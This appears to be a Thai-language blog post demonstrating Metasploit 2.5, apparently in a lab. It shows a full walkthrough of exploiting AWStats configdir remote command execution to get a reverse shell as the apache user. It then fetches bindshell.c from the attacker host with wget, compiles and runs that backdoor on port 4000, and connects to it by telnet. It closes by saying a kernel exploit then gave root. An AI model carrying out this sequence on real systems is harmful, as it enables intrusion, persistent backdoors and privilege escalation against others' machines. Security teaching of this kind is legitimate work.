Saturday, December 15

ความน่าสนใจของ Metasloit

Metasploit เป็นเครื่องมือแบบ open source ที่สามารถใช้เพื่อพัฒนา ทดสอบ และใช้ exploit
# wget http://www.metasploit.com/tools/framework-2.5.tar.gz
--12:48:57-- http://www.metasploit.com/tools/framework-2.5.tar.gz
=> `framework-2.5.tar.gz'
Resolving www.metasploit.com... 66.234.161.200
Connecting to www.metasploit.com|66.234.161.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,625,719 (2.5M) [application/x-gzip]

100%[========================================================================================>] 2,625,719 11.23K/s ETA 00:00

12:53:14 (10.05 KB/s) - `framework-2.5.tar.gz' saved [2625719/2625719]

แตกไฟล์โดยใช้คำสั่ง tar
# tar -zxvf framework-2.5.tar.gz
framework-2.5/
framework-2.5/lib/
framework-2.5/lib/Msf/
framework-2.5/lib/Msf/Nop/
framework-2.5/lib/Msf/Nop/OptyNop2.pm
framework-2.5/lib/Msf/Nop/OptyNop2Tables.pm
framework-2.5/lib/Msf/PayloadComponent/
framework-2.5/lib/Msf/PayloadComponent/BSD/
framework-2.5/lib/Msf/PayloadComponent/BSD/ia32/

framework-2.5/extras/Term-ReadLine-Gnu-1.14.tar.gz
framework-2.5/msfcli
framework-2.5/msfweb
framework-2.5/msfpayload

เข้าไปในไดเร็กทอรี framework-2.5
# cd framework-2.5
[root@ca framework-2.5]# ls
data exploits msfcli msfencode msfpescan nops src
docs extras msfconsole msflogdump msfupdate payloads tools
encoders lib msfelfscan msfpayload msfweb sdk

เรียก console
# ./msfconsole


__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


+ -- --=[ msfconsole v2.5 [105 exploits - 74 payloads]

พิมพ์ help เพื่อดู option ที่สามารถใช้ได้
msf > help

Metasploit Framework Main Console Help
======================================

? Show the main console help
cd Change working directory
exit Exit the console
help Show the main console help
info Display detailed exploit or payload information
quit Exit the console
reload Reload exploits and payloads
save Save configuration to disk
setg Set a global environment variable
show Show available exploits and payloads
unsetg Remove a global environment variable
use Select an exploit by name
version Show console version

แสดง exploit ที่มี
msf > show exploits
Metasploit Framework Loaded Exploits
====================================

3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
altn_webadmin Alt-N WebAdmin USER Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
awstats_configdir_exec AWStats configdir Remote Command Execution

เรียกใช้ exploit ที่โจมตี awstats
msf > use awstats_configdir_exec

msf awstats_configdir_exec(cmd_unix_reverse) > set RHOST 192.168.1.204
RHOST -> 192.168.1.204
msf awstats_configdir_exec(cmd_unix_reverse) > set DIR /cgi-bin/
DIR -> /cgi-bin/
msf awstats_configdir_exec(cmd_unix_reverse) > set LHOST 192.168.1.203
LHOST -> 192.168.1.203
msf awstats_configdir_exec(cmd_unix_reverse) > set LPORT 4321
LPORT -> 4321

แสดง option ของ exploit
msf awstats_configdir_exec(cmd_unix_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------------- -----------------------------------
optional SSL Use SSL
required RHOST 192.168.1.204 The target address
optional VHOST The virtual host name of the server
required DIR /cgi-bin/ Directory of awstats.pl script
required RPORT 80 The target port

Payload: Name Default Description
-------- ------ ------------- -----------------------------------
required LHOST 192.168.1.203 Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Targetless Exploit

แสดง payload
msf awstats_configdir_exec > show payloads

Metasploit Framework Usable Payloads
====================================

cmd_generic Arbitrary Command
cmd_irix_bind Irix Inetd Bind Shell
cmd_unix_reverse Unix Telnet Piping Reverse Shell


เซ็ต payload ให้เป็น cmd_unix_reverse
msf awstats_configdir_exec(cmd_generic) > set PAYLOAD cmd_unix_reverse
PAYLOAD -> cmd_unix_reverse
msf awstats_configdir_exec(cmd_unix_reverse) > exploit
[*] Starting Reverse Handler.
[*] Establishing a connection to the target...

Trying 192.168.1.203...

Escape character is '^]'.
[*] Recieved first connection.
[*] Recieved second connection.
[*] Got connection from 192.168.1.203:4321 <-> 192.168.1.204:32796 192.168.1.203:4321 <-> 192.168.1.204:32797

id
uid=48(apache) gid=48(apache) groups=48(apache)
pwd
/usr/local/awstats/wwwroot/cgi-bin


ดาวน์โหลด bindshell.c ซึ่งเป็น backdoor ที่เปิดพอร์ต 4000 ไว้
cd /tmp
wget http://192.168.1.203/bindshell.c
--16:08:20-- http://192.168.1.203/bindshell.c
=> `bindshell.c'
Connecting to 192.168.1.203 ... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,083 [text/plain]

0K .. 100% 135.61 KB/s

16:08:20 (135.61 KB/s) - `bindshell.c' saved [2083/2083]

ls
bindshell.c
ssh-GDMM1551
ssh-dovU4939
gcc -o bindshell bindshell.c
ls
bindshell
bindshell.c
ssh-GDMM1551
ssh-dovU4939
./bindshell
Daemon is starting...OK, pid = 1648

Caught interrupt, exit connection? [y/n] y
[*] Exiting Reverse Handler.

msf awstats_configdir_exec(cmd_unix_reverse) > exit

telnet เข้าไปที่พอร์ต backdoor
# telnet 192.168.1.204 4000
Trying 192.168.1.204...
Connected to www.sran.net (192.168.1.204).
Escape character is '^]'.
sh-2.05b$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-2.05b$ sh-2.05b$ ls -al
total 204
drwxr-xr-x 19 root root 4096 Dec 16 15:18 .
drwxr-xr-x 19 root root 4096 Dec 16 15:18 ..
-rw-r--r-- 1 root root 0 Dec 16 15:18 .autofsck
drwxr-xr-x 2 root root 4096 Nov 28 12:23 bin
drwxr-xr-x 3 root root 4096 Nov 28 10:53 boot
drwxr-xr-x 21 root root 118784 Dec 16 15:19 dev
drwxr-xr-x 47 root root 4096 Dec 16 15:19 etc
drwxr-xr-x 5 root root 4096 Dec 1 11:25 home
drwxr-xr-x 2 root root 4096 Oct 7 2003 initrd
drwxr-xr-x 8 root root 4096 Nov 28 12:22 lib
drwx------ 2 root root 16384 Nov 28 05:45 lost+found
drwxr-xr-x 2 root root 4096 Sep 8 2003 misc
drwxr-xr-x 4 root root 4096 Nov 28 11:12 mnt
drwxr-xr-x 2 root root 4096 Oct 7 2003 opt
dr-xr-xr-x 60 root root 0 Dec 16 10:18 proc
drwxr-x--- 3 root root 4096 Dec 16 13:13 root
drwxr-xr-x 2 root root 8192 Nov 28 12:23 sbin
drwxrwxrwt 4 root root 4096 Dec 16 16:08 tmp
drwxr-xr-x 15 root root 4096 Nov 28 10:50 usr
drwxr-xr-x 18 root root 4096 Nov 28 10:56 var
sh-2.05b$ sh-2.05b$ cd /var/tmp
sh-2.05b$ sh-2.05b$ ls -al
total 8
drwxrwxrwt 2 root root 4096 Dec 15 14:59 .
drwxr-xr-x 18 root root 4096 Nov 28 10:56 ..
sh-2.05b$ sh-2.05b$ uname -a
Linux app.sran.org 2.4.22-1.2115.nptl #1 Wed Oct 29 15:20:17 EST 2003 i586 i586 i386 GNU/Linux



เมื่อได้ user ในระบบเป็น apache แล้วผมจึงพยายามต่อไปเพื่อให้ได้สิทธิ์ของ root การที่ระบบนี้ใช้ Linux kernel เวอร์ชั่นเก่าทำให้ไม่ยากที่จะหา exploit เพื่อโจมตีช่องโหว่ใน kernel และผมก็ได้ root ในที่สุด

นนทวรรธนะ สาระมาน
Nontawattana Saraman
SRAN Dev

No comments: